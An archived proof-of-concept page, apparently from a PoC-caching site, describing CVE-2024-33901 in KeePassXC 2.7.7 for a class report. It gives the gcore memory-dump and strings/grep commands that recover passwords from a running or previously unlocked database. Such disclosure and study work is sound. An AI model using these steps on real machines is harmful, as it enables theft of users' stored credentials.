Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-33901 PoC — KeePass 安全漏洞

Source
Associated Vulnerability
Title:KeePass 安全漏洞 (CVE-2024-33901)
Description:KeePass是一款开源的密码管理器。 KeePassXC 2.7.7版本存在安全漏洞,该漏洞源于允许攻击者恢复 .kdbx 数据库中存储的一些密码。
Description
Short program that demonstrates the vulnerability CVE-2024-33901 in KeePassXC version 2.7.7
Readme
# CVE-2024-33901-ProofOfConcept
Short program that demonstrates the vulnerability CVE-2024-33901 in KeePassXC version 2.7.7

The report for the class might need the source code linked, so that's why I created the repo for this

## How to replicate the vulnerability
1. Open KeePassXC and authenticate the database
2. While the database is authenticated, create a memory dump file for it

  This can be achieved by getting the PID, which can be done with this command:
  
    ps aux | grep keepassxc
  
  And then running this command: sudo gcore -o keepassxc_dump PID_HERE
  
  For example, if the PID that you got was 1234, then the command would have to be:
  
    sudo gcore -o keepassxc_dump 1234
  
3. Finally, you can run this command: cat keepassxc_dump.PID_HERE | strings | grep "password guess here"

  So if the PID was 1234, the command would be:

     cat keepassxc_dump.1234 | strings | grep "password guess here"

Once the memory dump file is created, the attack can be performed even if the database is locked again or if KeePassXC is closed.

The provided Python code performs all of these steps, and it attempts multiple password guesses based on the text files provided.
File Snapshot

[4.0K] /data/pocs/cf999209d27a1a7ae0016b8c54e3fdfd6033d51c ├── [ 81K] CommonPasswords.txt ├── [6.4K] keepassxc_exploit.py ├── [1.2K] README.md └── [ 34] TestPasswords.txt 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.